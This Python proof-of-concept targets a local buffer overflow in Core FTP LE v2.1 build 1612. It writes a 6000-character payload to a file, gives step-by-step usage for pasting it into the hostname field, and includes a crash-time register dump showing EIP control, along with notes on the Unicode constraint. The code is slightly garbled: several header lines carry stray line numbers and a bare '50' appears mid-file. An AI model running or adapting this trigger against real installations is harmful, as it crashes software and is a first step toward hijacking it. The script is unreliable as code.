1 #!/usr/bin/env python
2
3 ####################################################################################
4 #
5 # Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
6 # Found By: Dr_IDE
7 # Tested On: XPSP3, 7RC
8 # Notes: Most likely other versions are vulnerable too (only the build above was tested).
9 # Usage: run this script, then in Core FTP LE: File, Quick Connect, paste the contents of coreftple.txt into Hostname, Connect
10 #
11 ####################################################################################
12
# Register dump on XPSP3 at the time of the crash (notes in the docstring).
"""
Crash-time register dump on Windows XP SP3 after pasting the payload into the
Quick Connect hostname field.

What the dump shows, and the caveats for anyone trying to take this past a
crash:

* EIP, EBP and ECX all hold 00410041.  'A' is 0x41, and 00 41 00 41 is the
  little-endian layout of "AA" once it has been widened to UTF-16 -- the
  debugger also labels the buffer at ESP/EDI as UNICODE.  That is the
  "(Unicode)" in the title: the attacker controls EIP, but only with
  addresses of the form 0x00XX00YY, and any payload reached that way has to
  survive the same widening (Unicode-compatible encoding).  Treat the UTF-16
  conversion as the likely cause rather than a proven one; it is inferred
  from the register values, not from the binary.
* ESP and EDI point into the run of 'A's, so the payload is on the stack at
  the moment of the crash.
* LastErr is WSAHOST_NOT_FOUND: the lookup of the bogus hostname had already
  failed, so no reachable server is needed to reproduce this.
* This PoC stops at EIP control.  A working exploit still needs a usable
  0x00XX00YY return address and a Unicode-friendly payload; neither is
  attempted here, and nothing below should be read as proof of code
  execution.

EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0

              3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""

# After passing the exception to the application on XPSP3 the fault is
# unchanged: EIP 00410041 coreftp.00410041

# Length of the hostname payload.  6000 'A's was enough to reach the saved
# return address on the tested build; no attempt was made to find the
# exact offset, so this is a crash trigger, not a tuned exploit.
_PAYLOAD_LEN = 6000

# The payload itself: a plain run of 'A' (0x41).  It is written as text and
# pasted into the GUI, so it stays ASCII -- the Unicode expansion happens
# inside Core FTP, not here.
buff = "A" * _PAYLOAD_LEN
50
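# Write the payload to coreftple.txt in the current directory.  Open that
# file, copy its contents and paste them into the Quick Connect hostname
# field.  The context manager closes the handle even if the write raises,
# which the explicit open()/close() pair did not guarantee.
with open("coreftple.txt", "w") as f1:
    f1.write(buff)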